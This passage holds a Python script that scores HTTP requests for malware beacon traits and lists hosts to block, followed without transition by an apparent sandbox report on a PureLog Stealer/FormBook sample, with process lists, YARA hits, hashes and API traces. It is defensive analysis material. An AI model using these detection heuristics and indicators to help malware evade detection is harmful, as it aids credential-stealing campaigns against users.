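

def parse_request(raw):
    """Split a raw request into method, target, lower-cased header dict and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def raw_params(req):
    """Split form parameters without decoding, so raw '+', '/' and '=' in values stay visible."""
    qs = req["body"] if req["method"] == "POST" else urlsplit(req["target"]).query
    return [tuple(kv.split("=", 1)) if "=" in kv else (kv, "") for kv in qs.split("&") if kv]


def beacon_indicators(req):
    """Shape heuristics drawn from the recorded sessions; an assumption of this example, not a vendor rule."""
    h, hits = req["headers"], []
    if "BitdefenderSafepay/2016" in h.get("user-agent", ""):
        hits.append("User-Agent matches the string seen on every request from PID 6504")
    params = raw_params(req)
    if params and all(len(name) == 4 and name.isalnum() for name, _ in params):
        hits.append("every parameter name is a 4-character alphanumeric token")
    if any(RAW_B64_CHARS.search(value) for _, value in params):
        hits.append("parameter value carries unescaped '+', '/' or '=' (browsers percent-encode these)")
    referer = urlsplit(h.get("referer", ""))
    if (req["method"] == "POST" and urlsplit(h.get("origin", "")).hostname == h.get("host")
            and referer.hostname == h.get("host") and referer.path == urlsplit(req["target"]).path):
        hits.append("Origin and Referer point at the request's own host and path")
    return hits


def correlate(requests):
    """Map each parameter name to the hosts it was sent to; reuse across unrelated hosts is a pivot."""
    by_name = {}
    for raw in requests:
        req = parse_request(raw)
        for name, _ in raw_params(req):
            by_name.setdefault(name, set()).add(req["headers"]["host"])
    return by_name


def triage(requests, threshold=2):
    """Flag requests with at least `threshold` indicators and collect hosts, paths and reused parameter names."""
    report = {"flagged": [], "hosts": set(), "paths": set(), "reused_params": {}}
    for raw in requests:
        req = parse_request(raw)
        hits = beacon_indicators(req)
        if len(hits) >= threshold:  # one heuristic alone is too weak to act on
            path = urlsplit(req["target"]).path
            report["flagged"].append((req["method"], req["headers"]["host"], path, hits))
            report["hosts"].add(req["headers"]["host"])
            report["paths"].add(path)
    report["reused_params"] = {n: sorted(hs) for n, hs in correlate(requests).items() if len(hs) > 1}
    return report


if __name__ == "__main__":
    result = triage(SAMPLE_REQUESTS)
    for method, host, path, hits in result["flagged"]:
        print(f"{method} http://{host}{path}")
        for hit in hits:
            print("  -", hit)
    print("hosts to block:", sorted(result["hosts"]))
    print("parameter names reused across hosts:", result["reused_params"])
```

Run against the embedded input, the three copied requests are flagged (the POSTs on all four indicators, the GET on three, since it carries no Origin or Referer), the benign post on none, and ynlT is the one parameter name reused against both hosts. The threshold is deliberately above one: the 4-character-name rule on its own would also match ordinary forms, so act only on the combination.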


                                                                                Target ID:0
                                                                                Start time:03:27:02
                                                                                Start date:26/11/2024
                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                Imagebase:0xa50000
                                                                                File size:774'656 bytes
                                                                                MD5 hash:09E5C83FA32B0BB661143784179329A0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1420015259.0000000007200000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1417267830.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:03:27:04
                                                                                Start date:26/11/2024
                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                Imagebase:0x450000
                                                                                File size:774'656 bytes
                                                                                MD5 hash:09E5C83FA32B0BB661143784179329A0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1567443784.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1572202797.0000000001360000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:4
                                                                                Start time:03:27:12
                                                                                Start date:26/11/2024
                                                                                Path:C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe"
                                                                                Imagebase:0x290000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:5
                                                                                Start time:03:27:14
                                                                                Start date:26/11/2024
                                                                                Path:C:\Windows\SysWOW64\find.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\find.exe"
                                                                                Imagebase:0xed0000
                                                                                File size:14'848 bytes
                                                                                MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3864375083.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3857227824.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:7
                                                                                Start time:03:27:27
                                                                                Start date:26/11/2024
                                                                                Path:C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe"
                                                                                Imagebase:0x290000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:9
                                                                                Start time:03:27:41
                                                                                Start date:26/11/2024
                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                Imagebase:0x7ff6d20e0000
                                                                                File size:676'768 bytes
                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true


                                                                                  Execution Graph

                                                                                  Execution Coverage:10.6%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:13.6%
                                                                                  Total number of Nodes:59
                                                                                  Total number of Limit Nodes:4

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $<ov!
                                                                                  • API String ID: 0-3807132934
                                                                                  • Opcode ID: d63e66e5021e8332a4e880e1204973c897de4e3c8f37ff3b9e0c28b54eaf1481
                                                                                  • Instruction ID: bdb749ca2ab10005eb168ff31a6fee3740f1238a7ac52093409c25f27d42a7cb
                                                                                  • Opcode Fuzzy Hash: d63e66e5021e8332a4e880e1204973c897de4e3c8f37ff3b9e0c28b54eaf1481
                                                                                  • Instruction Fuzzy Hash: D8B2C4B4900228CFDB65DF69C984AD9BBB2FF89300F1581E9D50DAB225DB319E81DF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7655cc2313d95f2f9f139baec4901261fe354c027697ab4fdfec42e9c05cdf06
                                                                                  • Instruction ID: e9bdaef7e6f9a866f34d5bd9c6d49b3c4c7827e61d598d52172a64576af1ff16
                                                                                  • Opcode Fuzzy Hash: 7655cc2313d95f2f9f139baec4901261fe354c027697ab4fdfec42e9c05cdf06
                                                                                  • Instruction Fuzzy Hash: 7443DFB4A00229CFDB24DF69C888A9DB7B2BF49310F1581D5D949AB361DB31ED82DF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6105b5d1cf8b45f55865dd66f1de400c23dfebbb607713684bf08409c3943a1e
                                                                                  • Instruction ID: 6b0a4479076636f771a4546043355305c1f44391820501b4cca9eb3eb1a5b65a
                                                                                  • Opcode Fuzzy Hash: 6105b5d1cf8b45f55865dd66f1de400c23dfebbb607713684bf08409c3943a1e
                                                                                  • Instruction Fuzzy Hash: 475252B5A00226DFEB14DF79C484A6D7BB2BF89710F158169E919DB360DB31EC02DB90

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d3715a6d6b4a36d98fec02d08ddae18b414d6787814377148ff4300ab0f2c43c
                                                                                  • Instruction ID: 6fa6c720a7c351ec4e336704045fe3cfb0b17af78e63dc72480372163def62fd
                                                                                  • Opcode Fuzzy Hash: d3715a6d6b4a36d98fec02d08ddae18b414d6787814377148ff4300ab0f2c43c
                                                                                  • Instruction Fuzzy Hash: 39325270E102288FEB58DFA9C45479EBBF2BF88300F14816AD449AB395DB349D46DF91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dff37674be419bd55a975571cdba4742549a969d27c75ce900fded277122ccf8
                                                                                  • Instruction ID: bdf283612a58daf12ed17972c4b3fb86a2e3816af6e5c75926575015e96caf92
                                                                                  • Opcode Fuzzy Hash: dff37674be419bd55a975571cdba4742549a969d27c75ce900fded277122ccf8
                                                                                  • Instruction Fuzzy Hash: FDC14EB1E00269CFEF29DF65C98479DBBB2AF88300F14C169D449AB255EB30D989DF50

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0146B29E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415921557.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1460000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 58fe97cdeabc74f7d2e8c8eb94ea57978cfd74378c0b2b48b2207aebd5862cca
                                                                                  • Instruction ID: 6e3054a93c871a347eda9c980455b9a6482e8b7cbca01ff234860415c845e1df
                                                                                  • Opcode Fuzzy Hash: 58fe97cdeabc74f7d2e8c8eb94ea57978cfd74378c0b2b48b2207aebd5862cca
                                                                                  • Instruction Fuzzy Hash: 30712470A00B059FDB24DF2AD45479BBBF5FF88248F00892ED58AD7B60DB75E8058B91

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 014659A9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415921557.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1460000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: c46ba3c45507feb8efedf509eb73a5ea6ec9e39abdf2b441143b320bf92860f4
                                                                                  • Instruction ID: d2ddaa8a9709ed5fc95b2fc4e6e22f6f7777ab51a4527cb059840090ccf99822
                                                                                  • Opcode Fuzzy Hash: c46ba3c45507feb8efedf509eb73a5ea6ec9e39abdf2b441143b320bf92860f4
                                                                                  • Instruction Fuzzy Hash: 6441F5B0D0071DCFDB24DFA9C88478EBBB6BF88704F20816AD408AB251DB715945CF91

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 014659A9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415921557.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1460000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 17319606dc85cc23a12be2771ce35b85809b6a3ba94f6e7b9a09edf55fe4ab21
                                                                                  • Instruction ID: 3a70f12fed948cf4caef30ac4a753e775e99eaa2d45121b6f5a9552c328e64b6
                                                                                  • Opcode Fuzzy Hash: 17319606dc85cc23a12be2771ce35b85809b6a3ba94f6e7b9a09edf55fe4ab21
                                                                                  • Instruction Fuzzy Hash: AA41F2B1D00719CFDB24DFA9C88478EBBB6BF89704F20816AD408AB251DB756946CF91

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 07320E47
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFromIconResource
                                                                                  • String ID:
                                                                                  • API String ID: 3668623891-0

                                                                                  Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed; basic blocks 146d520-146d5e2, call to DuplicateHandle)
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0146D4EE,?,?,?,?,?), ref: 0146D5AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415921557.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1460000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0

                                                                                  Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed; basic blocks 146af34-146d5e2, call to DuplicateHandle)
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0146D4EE,?,?,?,?,?), ref: 0146D5AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415921557.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1460000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0

                                                                                  Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed; basic blocks 146b238-146b2c8, call to GetModuleHandleW)
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0146B29E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415921557.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1460000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0

                                                                                  Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed; basic blocks 732223c-7322c9e, call to CloseHandle)
                                                                                  APIs
                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07322AB9,?,?), ref: 07322C60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0

                                                                                  Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed; basic blocks 7322c01-7322c9e, call to CloseHandle)
                                                                                  APIs
                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07322AB9,?,?), ref: 07322C60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415651275.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_140d000_file.jbxd
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415687899.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_141d000_file.jbxd
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415687899.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_141d000_file.jbxd
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415687899.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_141d000_file.jbxd
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415651275.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_140d000_file.jbxd
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415687899.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_141d000_file.jbxd
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415651275.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_140d000_file.jbxd
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415651275.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_140d000_file.jbxd
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415921557.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1460000_file.jbxd
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 11fe8d187d12c968e7f2d30fd45e1cc3135e9bb74205ea71475503d596eb113e
                                                                                  • Instruction ID: 2b71e4ebfec99bc0ffb9a4fbc03baa491721af525d761ba3eaabc67bd4f32569
                                                                                  • Opcode Fuzzy Hash: 11fe8d187d12c968e7f2d30fd45e1cc3135e9bb74205ea71475503d596eb113e
                                                                                  • Instruction Fuzzy Hash: 95610AB0A102198FE708EF7BE84569ABFF6FBC8301F14C529D4099B268EF706815DB40

                                                                                  Execution Graph

                                                                                  Execution Coverage:1.2%
                                                                                  Dynamic/Decrypted Code Coverage:4.9%
                                                                                  Signature Coverage:7.7%
                                                                                  Total number of Nodes:142
                                                                                  Total number of Limit Nodes:11

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 114 417993-4179bc call 42f533 118 4179c2-4179d0 call 42fb33 114->118 119 4179be-4179c1 114->119 122 4179e0-4179f1 call 42dfe3 118->122 123 4179d2-4179dd call 42fdd3 118->123 128 4179f3-417a07 LdrLoadDll 122->128 129 417a0a-417a0d 122->129 123->122 128->129
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A05
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 3450b841a561fce2ec7eb3af1f5bde3703eef7511fec9e05869c83b7c4bbb847
                                                                                  • Instruction ID: c05735af9d87ff809b405e5c58a4850cca5856ce1274a566620df5b546512d83
                                                                                  • Opcode Fuzzy Hash: 3450b841a561fce2ec7eb3af1f5bde3703eef7511fec9e05869c83b7c4bbb847
                                                                                  • Instruction Fuzzy Hash: 290171B1E0020DBBDF10DBE5DC42FDEB7B89B54308F4041AAE90897240F634EB488B95

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 140 42c8c3-42c8fc call 4046d3 call 42dad3 NtClose
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C8F7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                  • Instruction ID: 133e63d4455ab17c9b30316577fb7d960e1753245c68e5cabd7d79e4ae334b6d
                                                                                  • Opcode Fuzzy Hash: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                  • Instruction Fuzzy Hash: 46E086356042147BD120EB5AEC41F9B775CDFC5754F408419FA09A7241C6B5B91187F5

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 154 f82b60-f82b6c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 441f77228d1197e61000e0cc8c63192e2824b5d5ba03b21552eb8c4447c15d38
                                                                                  • Instruction ID: a3efc0f309478cce6d7776b941e2c2e79bb64630ca5fcc1859ab5446641a9763
                                                                                  • Opcode Fuzzy Hash: 441f77228d1197e61000e0cc8c63192e2824b5d5ba03b21552eb8c4447c15d38
                                                                                  • Instruction Fuzzy Hash: 1B90026120240013560571588414616400A87E1341B55C032E1018590EC92989927129

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 155 f82c70-f82c7c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 8f6125bbfda9ff7877326b1a5227a07460be57975506bd5448640b2ce7a592c6
                                                                                  • Instruction ID: 1b795bba94f4159031ab2cb7ac2b3153a339210e5ff17b78a2b3f16fc5a5c20e
                                                                                  • Opcode Fuzzy Hash: 8f6125bbfda9ff7877326b1a5227a07460be57975506bd5448640b2ce7a592c6
                                                                                  • Instruction Fuzzy Hash: 1C90023120148812E6107158C40474A000587D1341F59C422A4428658E8A9989927125
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 140d1b940f640b88caab6d9876f3cca74ad7f507a8cdca40f0da607cfdf1ea36
                                                                                  • Instruction ID: 9a0c3bd3a76b6d1e499344bbe31e52bd22553f02bb51321b60ce05f6bb2f3c61
                                                                                  • Opcode Fuzzy Hash: 140d1b940f640b88caab6d9876f3cca74ad7f507a8cdca40f0da607cfdf1ea36
                                                                                  • Instruction Fuzzy Hash: 3190023120140423E61171588504707000987D1381F95C423A0428558E9A5A8A53B125
                                                                                  APIs
                                                                                  Memory Dump Source
